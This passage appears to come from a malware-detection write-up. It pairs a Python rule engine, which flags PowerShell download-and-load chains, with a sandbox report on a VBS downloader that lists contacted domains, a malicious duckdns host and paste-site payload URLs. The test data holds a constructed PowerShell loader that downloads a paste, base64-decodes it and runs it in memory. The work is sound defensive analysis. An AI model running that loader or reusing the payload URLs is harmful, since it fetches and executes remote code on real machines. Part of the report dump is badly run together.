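# A loader needs these names; their reversed spellings betray reversed-string obfuscation.
KEYWORDS = ("Invoke-Expression", "FromBase64String", "DownloadString", "Assembly")
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def script_indicators(script: str) -> List[str]:
    """Indicators of the fetch / base64-decode / in-memory load pattern in decoded PowerShell."""
    hits = []
    if re.search(r"FromBase64String", script, re.I):
        hits.append("frombase64string")
    if re.search(r"\[[^\]]*Assembly\]::Load\(", script, re.I):
        hits.append("assembly_load")
    if any(kw[::-1] in script for kw in KEYWORDS):
        hits.append("reversed_string")
    if any(host in script.lower() for host in PASTE_HOSTS):
        hits.append("paste_site_url")
    return hits


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Parent chain, nearest first; stops at an unknown or already visited parent."""
    chain, seen, cur = [], {ev.pid}, by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def evaluate(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs for every rule a process trips."""
    by_pid = {e.pid: e for e in events}
    alerts: List[Tuple[int, str]] = []
    for ev in events:
        parents = ancestors(ev, by_pid)
        if ev.image == "powershell.exe":
            if parents and parents[0].image in SCRIPT_HOSTS:
                alerts.append((ev.pid, "script_host_spawns_powershell"))
            script = decode_encoded_command(ev.cmdline)
            if script is not None:
                alerts.append((ev.pid, "encoded_command"))
                alerts.extend((ev.pid, ind) for ind in script_indicators(script))
        if ev.image in NET_UTILITIES:
            if any(p.image == "powershell.exe" for p in parents):
                alerts.append((ev.pid, "net_utility_under_powershell"))
            if ev.dest_port is not None and ev.dest_port not in WEB_PORTS:
                alerts.append((ev.pid, "net_utility_nonstandard_port"))
    return alerts


# Constructed stage-2 script: download a paste, base64-decode it, load it in-process
# and run its entry point. The paste URL is a placeholder, not the sample's.
STAGE2 = ("$r='noisserpxE-ekovnI';"
          "$d=(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE');"
          "$b=[Convert]::FromBase64String($d);"
          "[Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)")
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed; PIDs, paths and the IP (TEST-NET-2) are placeholders
    ProcEvent(1000, 900, "explorer.exe", "explorer.exe"),
    ProcEvent(1001, 1000, "wscript.exe", r'wscript.exe "C:\Users\user\Downloads\sostener.vbs"'),
    ProcEvent(1002, 1001, "powershell.exe", 'powershell.exe -w hidden -nop -ep bypass -c "..."'),
    ProcEvent(1003, 1002, "powershell.exe", f"powershell.exe -w hidden -enc {ENCODED}"),
    ProcEvent(1004, 1003, "regasm.exe", "RegAsm.exe", dest_ip="198.51.100.7", dest_port=7000),
    ProcEvent(1005, 1000, "notepad.exe", "notepad.exe"),                   # benign control
    ProcEvent(1006, 1000, "regasm.exe", r"RegAsm.exe C:\build\lib.dll"),   # legitimate use, no network
]

if __name__ == "__main__":
    for pid, rule in evaluate(SAMPLE_EVENTS):
        print(pid, rule)
```

The rules are deliberately keyed to the chain rather than to the binary: the script-host parent, the encoded second stage with FromBase64String, Assembly.Load, a reversed keyword and a paste-site URL, and RegAsm.exe both descending from PowerShell and reaching a non-web port. The legitimate RegAsm.exe launched from explorer.exe with no network activity trips nothing, which is the false-positive case to keep in mind when deploying the same logic against real process telemetry.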
                Submitted sample (Source / Detection / Scanner / Label):
                sostener.vbs  16%  ReversingLabs  Win32.Trojan.Honolulu
                sostener.vbs  100%  Avira  VBS/Dldr.Agent.VPWC

                Dropped files (Source / Detection / Scanner / Label):
                C:\Users\user\AppData\Local\Temp\sostener.vbs  100%  Avira  VBS/Dldr.Agent.VPWC

                No Antivirus matches

                Domains (Source / Detection / Scanner):
                s3-w.us-east-1.amazonaws.com  0%  Virustotal
                bitbucket.org  0%  Virustotal
                paste.ee  1%  Virustotal
                pastebin.com  0%  Virustotal
                bbuseruploads.s3.amazonaws.com  3%  Virustotal

                URLs (Source / Detection / Scanner / Label):
                https://contoso.com/License  0%  URL Reputation  safe
                https://contoso.com/  0%  URL Reputation  safe
                https://nuget.org/nuget.exe  0%  URL Reputation  safe
                https://oneget.orgX  0%  URL Reputation  safe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name  0%  URL Reputation  safe
                http://nuget.org/NuGet.exe  0%  URL Reputation  safe
                http://pesterbdd.com/images/Pester.png  0%  URL Reputation  safe
                https://go.micro  0%  URL Reputation  safe
                https://contoso.com/Icon  0%  URL Reputation  safe
                https://aka.ms/pscore68  0%  URL Reputation  safe
                https://oneget.org  0%  URL Reputation  safe
                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/  0%  Virustotal
                https://pastebin.com/raw  1%  Virustotal
                https://pastebin.com/raw/sFgsbG3v  4%  Virustotal
                https://www.google.com  0%  Virustotal
                https://aui-cdn.atlassian.com/  0%  Virustotal
                https://paste.ee  1%  Virustotal
                https://analytics.paste.ee  1%  Virustotal
                https://cdnjs.cloudflare.com  0%  Virustotal
                https://bitbucket.org  0%  Virustotal
                https://remote-app-switcher.prod-east.frontend.public.atl-paas.net  0%  Virustotal
                http://www.apache.org/licenses/LICENSE-2.0  0%  Virustotal
                http://bbuseruploads.s3.amazonaws.com  3%  Virustotal
                https://bbuseruploads.s3.amazonaws.com  1%  Virustotal
                http://s3-w.us-east-1.amazonaws.com  0%  Virustotal
                https://web-security-reports.services.atlassian.com/csp-report/bb-website  0%  Virustotal
                https://dz8aopenkvv6s.cloudfront.net  0%  Virustotal
                https://secure.gravatar.com  0%  Virustotal
                http://bitbucket.org  0%  Virustotal
                http://paste.ee  1%  Virustotal
                http://pastebin.com/raw/v9y5q5vv  2%  Virustotal
                https://cdn.cookielaw.org/  0%  Virustotal
                https://github.com/Pester/Pester  1%  Virustotal
                http://www.apache.org/licenses/LICENSE-2.0.html  0%  Virustotal
                https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;  0%  Virustotal
                https://remote-app-switcher.stg-east.frontend.public.atl-paas.net  0%  Virustotal
                Contacted domains (Name / IP / Active / Malicious / Reputation; no antivirus detection is listed for any entry):
                s3-w.us-east-1.amazonaws.com  52.216.144.11  true  false  unknown
                bitbucket.org  185.166.143.50  true  false  unknown
                toskaadmx.duckdns.org  46.246.14.3  true  true  unknown
                paste.ee  188.114.96.3  true  true  unknown
                pastebin.com  104.20.4.235  true  true  unknown
                bbuseruploads.s3.amazonaws.com  unknown  unknown  true  unknown

                Contacted URLs (Name / Malicious / Reputation; no antivirus detection is listed for any entry):
                https://pastebin.com/raw/sFgsbG3v  false  unknown
                https://pastebin.com/raw/cD7bJS7b  false  unknown
                https://paste.ee/d/lHbHo/0  true  unknown
                toskaadmx.duckdns.org  true  unknown
                https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt  false  unknown
                http://pastebin.com/raw/V9y5Q5vv  true  unknown
                https://pastebin.com/raw/V9y5Q5vv  false  unknown
                URLs found in process memory (Name / Source / Malicious / Antivirus Detection / Reputation):

                https://pastebin.com/raw
                    Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                https://contoso.com/License
                    Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                    Source: powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                https://analytics.paste.ee
                    Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                https://bbuseruploads.s3.amazonaws.com/5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-
                    Source: powershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                https://paste.ee
                    Source: powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                HTTPS://PASTEBIN.COM/RAW/CD7BJS7B
                    Source: powershell.exe, 00000004.00000002.2176643102.000002870058A000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D692B000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                http://crl.microsofto
                    Source: powershell.exe, 0000000E.00000002.2401200406.00000272D4974000.00000004.00000020.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                https://www.google.com
                    Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                https://contoso.com/
                    Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
                https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000004.00000002.2176643102.0000028701A14000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2254576347.000002871007F000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2150319912.000002C0E23D5000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2150319912.000002C0E229F000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2133813473.000002C0D3ADD000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D7D48000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2578721401.00000272E6413000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000F.00000002.2507053683.0000027C1CBAE000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000F.00000002.2507053683.0000027C1CCE4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
                https://oneget.orgX
                    Source: powershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
                https://aui-cdn.atlassian.com/
                    Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false; Reputation: unknown
                https://paste.ee/d/lHbHo/0P
                    Source: powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp
                    Malicious: false
                                      unknown
                                      https://cdnjs.cloudflare.com;powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://s3-w.us-east-1.amazonaws.compowershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2293886906.0000019BAE651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D2221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3349422989.0000000003081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5AD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0CB31000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://bitbucket.orgpowershell.exe, 00000004.00000002.2176643102.00000287003EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D678B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        http://bbuseruploads.s3.amazonaws.compowershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://secure.gravatar.compowershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://bbuseruploads.s3.amazonaws.comppowershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2176643102.0000028701A14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2254576347.000002871007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E23D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E229F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D3ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2578721401.00000272E6413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CCE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          https://bbuseruploads.s3.amazonaws.compowershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://bbuseruploads.s3.amazohpowershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://paste.eepowershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            https://go.micropowershell.exe, 00000004.00000002.2176643102.0000028701199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D73E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://bitbucket.orgpowershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A69000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            https://www.google.com;powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://contoso.com/Iconpowershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://cdn.cookielaw.org/powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              http://pastebin.com/raw/v9y5q5vvpowershell.exe, 00000004.00000002.2270156438.000002877C720000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                              https://analytics.paste.ee;powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2293886906.0000019BAE670000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2293886906.0000019BAE6BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D2221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5A16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0CB31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://firebasestorage.googlehpowershell.exe, 00000004.00000002.2176643102.000002870195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://pastebin.compowershell.exe, 00000004.00000002.2176643102.0000028701648000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.000002870164D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D79FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A00000.00000004.00000800.00020000.00000000.sdmptrue
                                                    unknown
                                                    https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txtPpowershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://pastebin.compowershell.exe, 00000004.00000002.2176643102.000002870058A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.000002870164D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D692B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D675B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://themes.googleusercontent.compowershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://oneget.orgpowershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://bbuseruploads.s3.amazohxpowershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
IP              Domain                         Country         ASN     ASN Name                   Malicious
104.20.4.235    pastebin.com                   United States   13335   CLOUDFLARENETUS            true
188.114.96.3    paste.ee                       European Union  13335   CLOUDFLARENETUS            true
3.5.25.83       unknown                        United States   14618   AMAZON-AESUS               false
52.216.144.11   s3-w.us-east-1.amazonaws.com   United States   16509   AMAZON-02US                false
